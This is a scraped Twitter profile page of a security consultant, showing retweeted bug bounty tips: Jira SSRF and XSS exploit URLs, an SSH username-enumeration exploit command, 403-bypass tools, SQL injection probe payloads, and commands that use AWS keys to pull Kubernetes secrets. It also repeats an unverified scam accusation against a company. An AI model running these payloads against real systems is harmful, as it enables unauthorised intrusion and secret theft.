Sajibe Kanti(@Sajibekantibd) 's Twitter Profileg
Sajibe Kanti

@Sajibekantibd

Information Security Consultant @QNAP_nas

RHCSA | RHCE | CCNA | CNSS | VAPT | WordPress Ninja | Bug Bounty Hunter | Smart Contract Auditor | Problem Solver

ID:745099580

linkhttps://bugcrowd.com/Sajibekanti calendar_today08-08-2012 12:26:25

1,1K Tweets

1,3K Followers

899 Following

Tuhin Bose(@tuhin1729_) 's Twitter Profile Photo

Jira Vulnerabilities:

1. CVE-2017-9506(SSRF):
http://<JIRA>/plugins/servlet/oauth/users/icon-uri?consumerUri=http://bing(.)com

2. CVE-2018-20824(XSS):
http://<JIRA>/plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain)

(1/n)

account_circle
Ed(@EdOverflow) 's Twitter Profile Photo

Bug bounty tip: is:issue label:Vulnerable and is:issue label:'Edge case' are your friends on github.com/EdOverflow/can…. :)

Bug bounty tip: is:issue label:Vulnerable and is:issue label:'Edge case' are your friends on github.com/EdOverflow/can…. :)
account_circle
Aman(@thevyadha) 's Twitter Profile Photo

tips

Found a $$$$ RCE with CVE-2018-15473

Steps :

1. Found an IP of the company eg: testing.com then cloned the CVE from github.com/Rhynorater/CVE…

2. Ran the command
/sshUsernameEnumExploit.py --username root 0.0.0.0 (ip)

account_circle
Aditya Shende(@ADITYASHENDE17) 's Twitter Profile Photo

Burpsuite extension to bypass 403 restricted directory.

Installation
BurpSuite -> Extender -> Extensions -> Add -> Extension Type: Python -> Select file: 403bypasser.py -> Next till Fininsh.

github.com/sting8k/BurpSu…

account_circle
Lu𝑖s Toro(@lobuhisec) 's Twitter Profile Photo

My biggest contribution to github ever made: byp4xx, a simple bash script to bypass 403 forbidden error using methods mentioned in :
github.com/lobuhi/byp4xx/

My biggest contribution to github ever made: byp4xx, a simple bash script to bypass 403 forbidden error using methods mentioned in #bugbountytips: github.com/lobuhi/byp4xx/
account_circle
Sajibe Kanti(@Sajibekantibd) 's Twitter Profile Photo

Hello World
Found another Scammer
HedgeTrade
Don't use there Service they are Scam To Customer & Employee

If anyone need Proof DM Me
./

account_circle
BugBountyHunter.com 🪲(@BugBountyHunt3r) 's Twitter Profile Photo

We just added publicly disclosed issues from HackerOne sorted by vulnerability type so you can learn what types of vulnerabilities to look for on specific programs. More features in the pipeline on the way to help you with your hunt!

bugbountyhunter.com/disclosed/

We just added publicly disclosed issues from @Hacker0x01 sorted by vulnerability type so you can learn what types of vulnerabilities to look for on specific programs. More features in the pipeline on the way to help you with your hunt! bugbountyhunter.com/disclosed/
account_circle
swaysthinking(@swaysThinking) 's Twitter Profile Photo

Hey bountyhunters, here is an honest tip:

Don't rely on twitter.

Stop consuming what makes other hunters money, and start hunting and getting experience with methodologies, techniques, tools, and bug-classes that work for you.

tips

account_circle
Random Robbie(@Random_Robbie) 's Twitter Profile Photo

$ export AWS_ACCESS_KEY_ID=AKIAI44QH
$ export AWS_SECRET_ACCESS_KEY=wJalrXUtnF
$ export AWS_SESSION_TOKEN=AQoD

aws eks list-clusters | jq -rc '.clusters'

['example']

aws eks update-kubeconfig --name example

kubectl get secrets

boom...
s

account_circle
AISECUREME(@aisecureme) 's Twitter Profile Photo

This is how to find sql-Injection 100% of the time
For site.com/?q=HERE

/?q=1
/?q=1'
/?q=1'
/?q=[1]
/?q[]=1
/?q=1`
/?q=1\
/?q=1/*'*/
/?q=1/*!1111'*/
/?q=1'||'asd'||' <== concat string
/?q=1' or '1'='1
/?q=1 or 1=1
/?q='or''='

account_circle
Harsh Bothra(@harshbothra_) 's Twitter Profile Photo

Recently during initial , I came across a vulnerable Splunk instance which had a sensitive information disclosure vulnerability (P3).
Always go deep searching for and whenever you encounter a third-party service.

Recently during initial #recon, I came across a vulnerable Splunk instance which had a sensitive information disclosure vulnerability (P3). Always go deep searching for #exploits and #cves whenever you encounter a third-party service. #BugBountyTip #security #bugbounty #bugs
account_circle